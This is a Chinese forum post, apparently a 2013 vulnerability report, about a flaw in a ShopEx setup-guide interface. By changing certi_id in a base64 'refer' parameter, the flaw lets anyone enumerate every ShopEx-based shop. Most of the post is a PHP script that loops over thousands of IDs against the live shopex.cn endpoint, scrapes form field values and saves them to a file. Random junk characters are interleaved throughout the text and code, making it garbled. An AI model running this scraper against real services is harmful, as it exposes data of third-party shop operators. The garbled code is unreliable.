|
|
简要描述:' N8 D1 `% V5 x
ShopEx某接口缺陷,可遍历所有网站
& ^0 K4 K6 R" a3 T% @4 x详细说明:$ K. Q( d; T& Q+ H
问题出现在shopex 网店使用向导页面 + t+ ~' K8 _5 O
( ~( E: ^4 }$ k+ b2 d' U
8 W) j; @4 k0 b+ x9 U
) { V7 T0 U* Z& b9 Whttp://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
; y8 x4 v0 |- V$ c- }: _/ w9 ^8 [% x/ w
4 W0 `. ?* ~) o4 t* s, l' N3 W
& z* L- m5 v9 z7 r( C& f
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}; \+ O" o4 @. E
4 o. M+ Z1 G) h i/ f
6 X2 W! f; i/ r+ F2 F" j$ q& U0 L9 b
. ? e( }( g1 V; E5 e我们修改certi_id 即可遍历所有使用了ShopEx程序的网站
$ Z: o- h6 t8 j, G9 h% y. f
3 G2 P/ j! q& i5 t9 b2 r# i1 |2 A1 U2 J0 i9 c! c' @
# T& {/ O: Q- o+ C% n<?php( q& D% @8 V+ E; }
X) l$ y8 f) \* Z V
for ($i=1; $i < 10000; $i++) { //遍历: _) J8 n4 ?( A! X# O; b& O3 ^$ \" J
+ g9 Y+ B% o* H+ ~* H
ShowshopExD($i);. J7 W: j! _/ {, s! V
0 t- c* G6 D3 U2 w' y) Q }
{4 W# _8 B4 c. N d( d( @6 Z: E" w
function ShowshopExD($cid) {
5 I3 ^ ]% g) V8 w3 V" X1 y" \. V8 t1 y
$url='http://guide.ecos.shopex.cn/step2.php';9 k+ K# g q1 i* z! D2 d; U
! W; u& `+ V1 U3 \# e, O9 d6 S $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');: Z6 v [4 w+ ?' c* ~
# J( B% f0 h! G# S( W $url = $url.'?refer='.$refer;
! C. u( R0 u1 H2 N
" d! p' A# F. ^6 h- T% h $ch = curl_init($url);& @; ]/ p( c1 V/ M$ x
5 g; w; j1 d% M X2 b' ^4 Q" J2 b curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
; v$ n" n( s" d3 c/ y; @6 K
0 R/ d3 g' J7 A/ F! a9 B. g$ c curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
2 H' C* ?4 d& w0 c9 N, {, U1 L; U
/ I4 S) u( r: v $result = curl_exec($ch);: R- A6 |. V1 e$ B1 l
+ f, g& e- t5 \' R
$result = mb_convert_encoding($result, "gb2312", "UTF-8");3 k- `$ a: |* _+ D! t
0 y) V _" }8 n& Y' U# i
if(strpos($result,$refer))
; S. y T0 c0 s* T5 T0 I5 f; g5 B2 H+ A9 s
{
2 L7 H7 t/ |' U( }, D3 z: @. }. ?- u3 O( e7 x
$fp = fopen("c:/shopEx.txt",'ab'); //保存文件% A* V* d' T E+ d' M
1 X0 U) ~5 ~1 { preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);
9 | u0 [* `5 e n0 _4 V! y/ Q2 i& e5 P. P+ d" y1 V4 z% B
foreach ($value[1] as $key) {) \ C e0 f3 `% t- g$ }0 c7 h0 M
" V# g O6 m! o. P
preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
; d+ @+ V; F) E
! L: e' v6 l7 z echo $res[1][0].':'.$res[3][0]."\r\n";
( m p7 R& ]: C( x- B( W0 ?+ q+ l) A8 P) U1 Y+ Y& }7 h5 L
$col =$res[1][0].':'.$res[3][0]."\r\n"; |2 t! h+ l/ x8 x9 w; d8 V/ c
2 G. h0 R$ q7 ?& @6 K6 I0 ` fwrite($fp, $col, strlen($col)); ! a$ A) O. I# C# g
8 K1 ]6 C( T9 ~ }, ]4 T' c3 ~8 m3 T! j$ f$ a
' ^3 w. Q9 w2 E" q& r8 l G
echo '--------------------------------'."\r\n";
; h: T9 Y9 t) `/ b( r5 e7 ?: l- A' q' s# S! t
fclose($fp);
- F1 i) }3 p8 C5 Q& p! D3 p& a8 @# y, ~0 u: W
}- Y" D* O. X1 `3 U5 ^4 P: I/ ?( i
) w1 C. T" {, o" L" B; Q
flush();
2 L/ |# J( u( q# {5 C/ m0 U1 o# `( U$ W' X
curl_close($ch);
% C+ I* Z5 x' G: ^6 ? b! d( Q8 K/ ~- T5 `4 }" ^3 j: d, x; L
}
3 N8 q$ L( s; d7 e9 z1 B4 e
* F) u- [4 V9 {( c: I?>
' n2 c: u+ _" L4 T漏洞证明:
( i% d% o( ^3 }7 @http://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg) g2 X: @& ^& i" |# Z
refer换成其他加密方式
0 W6 x3 A" U0 x9 M% J2 m |
|
发表于 2013-9-21 15:59:47
收藏
支持
反对